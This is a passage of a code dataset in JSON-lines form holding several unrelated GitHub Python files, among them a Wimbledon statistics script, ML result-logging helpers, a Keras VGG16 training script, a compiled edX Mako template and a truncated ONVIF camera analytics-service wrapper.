display_winners_count(data)\n display_winning_countries(data)\n\n\ndef load_data():\n with open(filename, \"r\", encoding=\"utf-8-sig\") as in_file:\n in_file.readline()\n data = [data.strip() for data in in_file.readlines()]\n return data\n\n\ndef display_winners_count(data):\n winners = [record.split(\",\")[2] for record in data]\n\n winner_to_count = {}\n for winner in winners:\n winner_to_count[winner] = winner_to_count.get(winner, 0) + 1\n\n max_length = max(len(winner) for winner in list(winner_to_count.keys()))\n\n print(\"Wimbledon Champions:\")\n for winner, count in winner_to_count.items():\n print(f\"{winner:{max_length}} : {count:>3}\")\n\n\ndef display_winning_countries(data):\n countries = sorted(set([record.split(\",\")[1] for record in data]))\n print(f\"\\nThese {len(countries)} countries have won Wimbledon:\")\n print(\", 
\".join(countries))\n\n\nmain()\n","repo_name":"Brennen12/cp1404practicals","sub_path":"prac_05/wimbledon.py","file_name":"wimbledon.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24045212602","text":"import pandas as pd\nimport os\n\ndef write_confusion_matrix(file_name, conf_matrix):\n \"\"\"\n Gets filename and confusion matrix returned by the model to create a table of TP, FP, TN, and FN \n for each class and write them in a pickle file.\n\n Parameters\n ----------\n file_name : str\n File name specified by the user\n conf_matrix : numpy.ndarray\n A three dimensional array that includes the TP, NP, FP, FN for each class.\n\n Returns\n -------\n None\n\n \"\"\"\n \n file_path = './confusion_pkls/' + file_name\n\n l = [{\n 'class': i,\n 'TN': label[0][0],\n 'FN': label[0][1],\n 'TP': label[1][0],\n 'FP': label[1][1]}\n for i,label in enumerate(conf_matrix)]\n \n if not os.path.isfile(file_path):\n df = pd.DataFrame(l)\n df.to_pickle(file_path)\n else:\n df = pd.read_pickle(file_path)\n data = l\n \n df.append(data, ignore_index=True)\n\n os.remove(file_path)\n df.to_pickle(file_path)\n\ndef write_results(scores, file_name, model_name, plot_type, freeze, max_length):\n \"\"\"\n Creates a table of F1 scores, Hamming Loss along with the model, the plot source it was trained on, \n whether it was trained, and the maximum token length in a table. It then stores the results in a pickle \n file.\n\n Parameters\n ----------\n scores : dict\n Consists of F1 Macro/Micro and Hamming Loss.\n file_name : str\n File name specified by the user.\n model_name : str\n The model used for encoding.\n plot_type : str\n The plot source used to carry out the training process.\n freeze : bool\n Whether the model was fine-tuned.\n max_length : int\n The maximum length of the input tokens.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n file_path = './result_pkls/' + file_name\n\n if not os.path.isfile(file_path):\n score_dict = {'Model Name': [], 'Plot Source': [], 'F1 Macro': [], \n 'F1 Micro': [], 'Hamming Loss': [], 'Freeze?': [], 'Max Length': []}\n \n score_dict['Model Name'].append(model_name)\n score_dict['Plot Source'].append(plot_type)\n score_dict['Freeze?'].append(freeze)\n score_dict['Max Length'].append(max_length)\n score_dict['F1 Macro'].append(scores['eval_f1_macro'])\n score_dict['F1 Micro'].append(scores['eval_f1_micro'])\n score_dict['Hamming Loss'].append(scores['eval_hamming_loss'])\n\n df = pd.DataFrame(score_dict)\n df.to_pickle(file_path)\n\n else:\n\n df = pd.read_pickle(file_path)\n data = {'Model Name': model_name, 'Plot Source': plot_type, 'F1 Macro': scores['eval_f1_macro'], \n 'F1 Micro': scores['eval_f1_micro'], 'Hamming Loss': scores['eval_hamming_loss'], 'Freeze?': freeze,\n 'Max Length': max_length}\n \n df.append(data, ignore_index=True)\n\n os.remove(file_path)\n df.to_pickle(file_path)\n \n return('Results are saved in {}'.format(file_path))","repo_name":"seeinggreen/mlpcw","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35338023596","text":"from website import create_app\nimport socket\nimport os\n\napp = create_app()\n\nif __name__ == '__main__':\n gw = os.popen(\"ip -4 route show default\").read().split()\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((gw[2], 0))\n ipaddr = s.getsockname()[0]\n 
app.run(host=ipaddr, debug=True)\n print(ipaddr)\n","repo_name":"bigbrainbrian7/Flask-Web-App-Tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3380853031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 30 18:04:05 2023\n\ncompute downstream Mach number for nonideal flow\n\n@author: yan\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\nnc = 10\ncolors = plt.cm.tab20(np.linspace(0, 1, nc))\nwh = 0.02\n\nfig1 = plt.figure( dpi=300)\nlwh = 2\naxes = fig1.add_axes([0.15, 0.15, 0.7, 0.7]) #size of figure\n\nzt = [0.6,0.7,0.8,0.9]\nzt1 = [item - 0.01 for item in zt]\nzt2 = [item + 0.01 for item in zt]\nmaxdiff_mm = [ 3, 1.5, 1.2, 0.5] \nmaxdiff_mdm = [ 0.5, 0.4, 0.35, 0.25] \n\nplt.bar(zt1,maxdiff_mm,color=colors[0], width = wh,label=\"$MM$\")\nplt.bar(zt2,maxdiff_mdm,color=colors[1], width = wh,label=\"$MDM$\")\nplt.xticks(np.arange(min(zt), max(zt)+1, 0.1))\n\naxes.set_xlim([0.55, 0.95])\naxes.set_xlabel('$Z_t$',fontsize=12)\naxes.set_ylabel('$(\\Delta M_2)_{\\max}\\%$',fontsize=12) \n# axes.set_title('$Z_t = 0.9$',fontsize=14)\naxes.legend(loc=0 , prop={'size': 10}) # \nfig1.savefig(\"mm_mdm.eps\")\n\n\n##############################################################\nfig2 = plt.figure( dpi=300)\nlwh = 2\naxes = fig2.add_axes([0.15, 0.15, 0.7, 0.7]) #size of figure\n\nzt = [0.6,0.7,0.8,0.9]\nzt1 = [item - 0.01 for item in zt]\nzt2 = [item + 0.01 for item in zt]\n\n# maxdiff_mm = [1.0,3.0,6.0,9.2] \nmaxdiff_d4 = [ 2.0, 1.75, 0.8, 0.5, ] \nmaxdiff_d6 = [ 1.0, 0.7,0.6,0.2] \n\nplt.bar(zt1,maxdiff_d4,color=colors[0], width = wh,label=\"$D4$\")\nplt.bar(zt2,maxdiff_d6,color=colors[1], width = wh,label=\"$D6$\")\nplt.xticks(np.arange(min(zt), max(zt)+1, 0.1))\n\naxes.set_xlim([0.55, 0.95])\naxes.set_xlabel('$Z_t$',fontsize=12)\naxes.set_ylabel('$(\\Delta M_2)_{\\max}\\%$',fontsize=12) \n# axes.set_title('$Z_t = 0.9$',fontsize=14)\naxes.legend(loc=0 , prop={'size': 10}) # \nfig2.savefig(\"d4_d6.eps\")\n\n\n\n\n\n\n","repo_name":"PENGYAN777/PM_fans","sub_path":"complexity/siloxanes/plot_all.py","file_name":"plot_all.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42392968083","text":"from numpy.random import seed\nseed(8) #1\nfrom tensorflow import set_random_seed\nset_random_seed(7) #2\n\n#\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\n\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import Model ,load_model\nfrom tensorflow.keras.layers import Flatten, Dense, Dropout\nfrom tensorflow.keras.applications.inception_resnet_v2 import InceptionResNetV2, preprocess_input\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.applications.vgg16 import decode_predictions\nfrom keras.applications.vgg16 import VGG16\nfrom tensorflow.keras.optimizers import Adam, RMSprop\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport numpy as np\nimport tensorflow as tf\nfrom keras import models\nfrom keras import layers\nfrom keras.applications import VGG16\nfrom keras import optimizers\n\n\n\nIMAGE_SIZE = (150, 150)\nNUM_CLASSES = len(data_list)\nBATCH_SIZE = 10 # try reducing batch size or freeze more layers if your GPU runs out of memory\nNUM_EPOCHS = 20\nLEARNING_RATE =0.0005 #start off with high rate first 0.001 #5e-4\n\n\n\ndef setup_dataset(DATASET_PATH):\n\t#Train datagen here is a preprocessor\n\ttrain_datagen = ImageDataGenerator(rescale=1./255,\n\t rotation_range=50,\n\t featurewise_center = True,\n\t featurewise_std_normalization = True,\n\t width_shift_range=0.2,\n\t height_shift_range=0.2,\n\t shear_range=0.25,\n\t zoom_range=0.1,\n\t zca_whitening = True,\n\t channel_shift_range = 20,\n\t horizontal_flip = True ,\n\t vertical_flip = True ,\n\t validation_split = 0.2,\n\t fill_mode='constant')\n\n\t# test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input,\n\t# fill_mode='constant')\n\n\ttrain_batches = train_datagen.flow_from_directory(DATASET_PATH,\n\t target_size=IMAGE_SIZE,\n\t shuffle=True,\n\t batch_size=BATCH_SIZE,\n\t subset = \"training\",\n\t seed=42,\n\t class_mode=\"binary\",\n\t \n\t )\n\n\tvalid_batches = train_datagen.flow_from_directory(DATASET_PATH,\n\t target_size=IMAGE_SIZE,\n\t shuffle=True,\n\t batch_size=BATCH_SIZE,\n\t subset = \"validation\",\n\t seed=42,\n\t class_mode=\"binary\",\n\t \n\t \n\t )\n\n\n\n\n\ndef run(model_name, backbone, dataset_name):\n\tprint(\"model name : \"+model_name)\n\tprint(\"backbone : \"+backbone)\n\tprint(\"dataset name : \"+dataset_name)\n\tprint(\"training\")\n\n\tdataaset_path = './data/' + dataset_name + '/content/two/train'\n\tsetup_dataset(dataaset_path)\n\t\n\tconv_base = VGG16(weights='imagenet',\n include_top=False,\n input_shape=(150, 150, 3))\n\n\n\tconv_base.trainable = False\n\n\n\tmodel = models.Sequential()\n\tmodel.add(conv_base)\n\tmodel.add(layers.Flatten())\n\tmodel.add(layers.Dense(256, activation='relu'))\n\tmodel.add(layers.Dense(3, activation='softmax'))\n\n\n\tmodel.compile(loss='categorical_crossentropy',\n\t \n\t optimizer=optimizers.Adam(lr=LEARNING_RATE),\n\t metrics=['acc'])\n\n\n\n\n\t#FIT MODEL\n\tprint(len(train_batches))\n\tprint(len(valid_batches))\n\n\tSTEP_SIZE_TRAIN=train_batches.n//train_batches.batch_size\n\tSTEP_SIZE_VALID=valid_batches.n//valid_batches.batch_size\n\n\tresult=model.fit_generator(train_batches,\n\t steps_per_epoch =STEP_SIZE_TRAIN,\n\t validation_data = valid_batches,\n\t validation_steps = STEP_SIZE_VALID,\n\t epochs= NUM_EPOCHS, \n\t 
)\n\tmodel.save('Covid_Binary.h5')\n\n","repo_name":"shwetapan/Covid-19-Detection","sub_path":"modules/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"37004994923","text":"# -*- coding:utf-8 -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\nSTOP_RENDERING = runtime.STOP_RENDERING\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1580297576.260314\n_enable_loop = True\n_template_filename = u'/home/css/edx-edutech/apps/edx/edx-platform/lms/templates/discussion/_discussion_inline.html'\n_template_uri = 'discussion/_discussion_inline.html'\n_source_encoding = 'utf-8'\n_exports = []\n\n\n\nfrom django.utils.translation import ugettext as _\nfrom json import dumps as json_dumps\nfrom openedx.core.djangolib.js_utils import js_escaped_string\n\n\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n can_create_subcomment = context.get('can_create_subcomment', UNDEFINED)\n display_name = context.get('display_name', UNDEFINED)\n discussion_target = context.get('discussion_target', UNDEFINED)\n discussion_category = context.get('discussion_category', UNDEFINED)\n can_create_thread = context.get('can_create_thread', UNDEFINED)\n user = context.get('user', UNDEFINED)\n login_msg = context.get('login_msg', UNDEFINED)\n can_create_comment = context.get('can_create_comment', UNDEFINED)\n course_id = context.get('course_id', UNDEFINED)\n discussion_id = context.get('discussion_id', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(u'\\n\\n')\n runtime._include_file(context, u'_underscore_templates.html', _template_uri)\n __M_writer(u'\\n')\n runtime._include_file(context, u'_thread_list_template.html', _template_uri)\n __M_writer(u'\\n\\n')\n __M_writer(u'\\n\\n
\\n')\n if not user.is_authenticated:\n __M_writer(u'
\\n
\\n \\n
')\n __M_writer(filters.html_escape(filters.decode.utf8(login_msg)))\n __M_writer(u'
\\n
\\n
\\n
\\n')\n __M_writer(u'
\\n

')\n __M_writer(filters.html_escape(filters.decode.utf8(_(display_name))))\n __M_writer(u'

\\n
')\n __M_writer(filters.html_escape(filters.decode.utf8(_(\"Topic:\"))))\n __M_writer(u' ')\n __M_writer(filters.html_escape(filters.decode.utf8(discussion_category)))\n __M_writer(u'\\n')\n if discussion_target:\n __M_writer(u' / ')\n __M_writer(filters.html_escape(filters.decode.utf8(discussion_target)))\n __M_writer(u'\\n')\n __M_writer(u'
\\n
\\n \\n\\n
\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"source_encoding\": \"utf-8\", \"line_map\": {\"16\": 6, \"22\": 1, \"37\": 1, \"38\": 3, \"39\": 3, \"40\": 4, \"41\": 4, \"42\": 10, \"43\": 12, \"44\": 12, \"45\": 13, \"46\": 13, \"47\": 14, \"48\": 14, \"49\": 15, \"50\": 15, \"51\": 16, \"52\": 17, \"53\": 20, \"54\": 20, \"55\": 25, \"56\": 26, \"57\": 26, \"58\": 27, \"59\": 27, \"60\": 27, \"61\": 27, \"62\": 28, \"63\": 29, \"64\": 29, \"65\": 29, \"66\": 31, \"67\": 34, \"68\": 34, \"69\": 35, \"70\": 35, \"71\": 36, \"72\": 36, \"73\": 41, \"74\": 41, \"80\": 74}, \"uri\": \"discussion/_discussion_inline.html\", \"filename\": \"/home/css/edx-edutech/apps/edx/edx-platform/lms/templates/discussion/_discussion_inline.html\"}\n__M_END_METADATA\n\"\"\"\n","repo_name":"lxp20201/lxp","sub_path":"edx-edutech/.tmp/mako_lms/d29c3d7f5a615bace280cb606b8bfd6f/discussion/_discussion_inline.html.py","file_name":"_discussion_inline.html.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40674254608","text":"# 3 = 1 + 2 = 2**0 + 2**1\n# 5 = 1 + 4 = 2**0 + 2**2\n# 2 = 2**1\n\nimport math\n\n\ndef help(N):\n M = 0\n ans = []\n\n while N > 0:\n res = math.log2(N)\n res = int(res)\n M = max(res, M)\n ans.append(res)\n N = N - 2**res\n\n M = M + 1\n ans = [str(M - a) for a in ans]\n\n return M, ans\n\n\nT = int(input())\nfor _ in range(T):\n N = int(input())\n M, ans = help(N)\n print(M)\n print(' '.join(ans))\n","repo_name":"LogicJake/code-for-interview","sub_path":"written-exam/4.27-拼多多-多多的细胞培养.py","file_name":"4.27-拼多多-多多的细胞培养.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"74728872876","text":"\"\"\"\nCreated to control Onvif Analitic service properties.\n\ncraeted by : enstns\ncreated time : 20.05.23\n\"\"\"\nimport logging\n\nfrom lib.onvif import OnvifService, get_caching_client\nfrom lib.requests_messages.analytics_request_messages import AnalyticsRequestMessages\n\nDEBUG = True\nLOG = False\n\nlogger = logging.getLogger('analytics_service')\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nANALYTIC_SERVICE_NS = \"http://www.onvif.org/ver20/analytics/wsdl\"\n\nif DEBUG:\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\nif LOG: \n log = logging.FileHandler(filename=\"log/onvif_service.log\", mode='a', encoding=None, delay=False, errors=None)\n log.setLevel(logging.DEBUG)\n log.setFormatter(formatter)\n logger.addHandler(log)\n\ndef get_analytics_namespace(services = [],xaddr=\"\"):\n if services and services != None:\n for serv in services:\n ns = str(serv.Namespace)\n if serv.XAddr == xaddr and \"analytics\" in ns:\n return serv.Namespace\n else:\n return None\n \nclass AnalyticsService:\n def __init__(self,onvif_service = OnvifService()) -> None:\n self.is_analytics_service_supported = False\n self.onvif_service = onvif_service\n self.wsdlUrl = self.onvif_service.wsdl_directory + \"/analytics.wsdl\"\n self.xAddr = \"\" \n self.analytics_name_space = \"\"\n self.capabilities = {}\n self.set_analytics_service_variables()\n\n def set_analytics_service_variables(self) -> None:\n if self.onvif_service.get_con_status() and self.onvif_service.capabilities.Analytics != None:\n 
self.is_analytics_service_supported = True\n self.xAddr = self.onvif_service.capabilities.Analytics.XAddr\n self.analytics_name_space = get_analytics_namespace(services = self.onvif_service.services,xaddr = self.xAddr)\n self.capabilities = self.GetServiceCapabilities()\n else:\n logger.error(f\"Analytics service not sported from {self.onvif_service.ip}\")\n # AnalyticsEngineBinding\n def GetServiceCapabilities(self) -> dict:\n \"\"\"\n Returns the capabilities of the analytics service. The result is returned in a typed answer.\n - return [dict];\n - Capabilities [Capabilities]\n The capabilities for the analytics service is returned in the Capabilities element.\n \"\"\"\n service_cap = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetServiceCapabilities information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n service_cap = ws_client_analytics.GetServiceCapabilities()\n except Exception as emsg:\n logger.error(f\"GetServiceCapabilities unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetServiceCapabilities complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return service_cap\n # AnalyticsEngineBinding\n def GetSupportedAnalyticsModules(self,configuration_token : str) -> list:\n \"\"\"\n List all analytics modules that are supported by the given VideoAnalyticsConfiguration.\n - requirements ;\n - configuration_token [str]\n Reference to an existing VideoAnalyticsConfiguration. \n - NOT: This parameters can be found with GetCompatibleVideoAnalyticsConfigurations method by Media Service\n - return [list];\n - SupportedAnalyticsModules [SupportedAnalyticsModules]\n \"\"\"\n supported_analytics_modules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetSupportedAnalyticsModules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n supported_analytics_modules = ws_client_analytics.GetSupportedAnalyticsModules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetSupportedAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetSupportedAnalyticsModules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return supported_analytics_modules\n # AnalyticsEngineBinding\n def CreateAnalyticsModules(self,request_message : AnalyticsRequestMessages.CreateAnalyticsModulesMessage) -> dict: # Not Tested\n \"\"\"\n Add one or more analytics modules to an existing VideoAnalyticsConfiguration. \n The available supported types can be retrieved via GetSupportedAnalyticsModules, where the Name of the supported AnalyticsModules correspond to the type of an AnalyticsModule instance.\n Pass unique module names which can be later used as reference. 
The Parameters of the analytics module must match those of the corresponding AnalyticsModuleDescription.\n - requirements;\n - request_message : [CreateAnalyticsModulesMessage]\n An Object for CreateAnalyticsModules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to CreateAnalyticsModules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n ws_client_analytics.CreateAnalyticsModules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"CreateAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"CreateAnalyticsModules complete with success..\")\n else:\n logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status\n # AnalyticsEngineBinding\n def DeleteAnalyticsModules(self,configuration_token : str,analytics_module_name : str) -> bool: # Not Tested\n \"\"\"\n Remove one or more analytics modules from a VideoAnalyticsConfiguration referenced by their names.\n - requirements : \n - configuration_token : [str] \n Reference to an existing Video Analytics configuration.\n - analytics_module_name : [str] \n Name of the AnalyticsModule to be deleted.\n - return [boolean]; \n - Delete Analytics Modules status\n \"\"\"\n delete_status = False\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to DeleteAnalyticsModules {analytics_module_name}..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n ws_client_analytics.DeleteAnalyticsModules(ConfigurationToken = configuration_token,AnalyticsModuleName = analytics_module_name)\n except Exception as emsg:\n logger.error(f\"DeleteAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"DeleteAnalyticsModules complete with success..\")\n delete_status = True\n else: logger.warning(f\"Analytics is not supported !\")\n else: logger.warning(f\"No Onvif Connection!\")\n return delete_status\n # AnalyticsEngineBinding\n def GetAnalyticsModuleOptions(self,configuration_token : str,analytics_type = None) -> bool: # Not Tested\n \"\"\"\n Return the options for the supported analytics modules that specify an Option attribute.\n - requirements : \n - configuration_token : [str] \n Reference to an existing AnalyticsConfiguration.\n - analytics_type - optional; [QName]\n Reference to an SupportedAnalyticsModule Type returned from GetSupportedAnalyticsModules.\n - return [dict];\n - Options - optional, unbounded; [ConfigOptions]\n List of options for the specified analytics module. 
The response Options shall not contain any RuleType attribute.\n \"\"\"\n options = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetAnalyticsModuleOptions information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n if analytics_type != None:\n options = ws_client_analytics.GetAnalyticsModuleOptions(ConfigurationToken = configuration_token,Type = analytics_type)\n else:\n options = ws_client_analytics.GetAnalyticsModuleOptions(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetAnalyticsModuleOptions unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetAnalyticsModuleOptions complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return options\n # AnalyticsEngineBinding\n def GetAnalyticsModules(self,configuration_token : str) -> list: # Not Tested\n \"\"\"\n List the currently assigned set of analytics modules of a VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n Reference to an existing AnalyticsConfiguration.\n - return [list];\n - AnalyticsModule - optional, unbounded; [Config]\n List of analytics modules \n \"\"\"\n analytics_modules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetAnalyticsModules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n analytics_modules = ws_client_analytics.GetAnalyticsModules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetAnalyticsModules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return analytics_modules\n # AnalyticsEngineBinding\n def GetSupportedMetadata(self,type_name = None) -> dict: # Not Tested\n \"\"\"\n This method provides a computer readable description of the metadata that the selected analytics modules can generate. \n The type parameter allows to select a single analytics module. 
\n By default the output shall relate to all analytics modules that exist in the device.\n - requirements : \n - type_name - optional; [QName]\n Optional reference to an AnalyticsModule Type returned from GetSupportedAnalyticsModules.\n - return [dict];\n - AnalyticsModule - optional, unbounded; [MetadataInfo]\n \"\"\"\n supported_metadata = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetSupportedMetadata information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n if type_name != None:\n supported_metadata = ws_client_analytics.GetSupportedMetadata(Type = type_name)\n else:\n supported_metadata = ws_client_analytics.GetSupportedMetadata()\n except Exception as emsg:\n logger.error(f\"GetSupportedMetadata unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetSupportedMetadata complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return supported_metadata\n # AnalyticsEngineBinding\n def ModifyAnalyticsModules(self,request_message : AnalyticsRequestMessages.ModifyAnalyticsModulesMessage) -> bool: # Not Tested\n \"\"\"\n Modify the settings of one or more analytics modules of a VideoAnalyticsConfiguration. \n The modules are referenced by their names. It is allowed to pass only a subset to be modified.\n - requirements;\n - request_message : [ModifyAnalyticsModulesMessage]\n An Object for ModifyAnalyticsModules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to ModifyAnalyticsModules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n ws_client_analytics.ModifyAnalyticsModules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"ModifyAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"ModifyAnalyticsModules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status\n # RuleEngineBinding\n def CreateRules(self,request_message : AnalyticsRequestMessages.CreateRulesMessage) -> bool:\n \"\"\"\n Add one or more analytics modules to an existing VideoAnalyticsConfiguration. 
\n The available supported types can be retrieved via GetSupportedAnalyticsModules, \\\n where the Name of the supported AnalyticsModules correspond to the type of an AnalyticsModule instance.\n - requirements;\n - request_message : [CreateRulesMessage]\n An Object for CreateRules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to CreateRules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n ws_client_analytics.CreateRules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"CreateRules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"CreateRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status\n # RuleEngineBinding\n def DeleteRules(self,configuration_token : str,rule_name : str) -> bool:\n \"\"\"\n Remove one or more rules from a VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n Reference to an existing Video Analytics configuration.\n - rule_name : [str] \n References the specific rule to be deleted (e.g. \"MyLineDetector\").\n - return [boolean]; \n - Delete Rules status\n \"\"\"\n delete_status = False\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to DeleteRules {rule_name}..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n ws_client_analytics.DeleteRules(ConfigurationToken = configuration_token,RuleName = rule_name)\n except Exception as emsg:\n logger.error(f\"DeleteRules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"DeleteRules complete with success..\")\n delete_status = True\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return delete_status\n # RuleEngineBinding\n def GetRuleOptions(self,configuration_token : str,rule_type = None) -> dict:\n \"\"\"\n Return the options for the supported rules that specify an Option attribute.\n - requirements : \n - configuration_token : [str] \n Reference to an existing analytics configuration.\n - rule_type - optional; [QName]\n Reference to an SupportedRule Type returned from GetSupportedRules.\n - return [dict];\n - 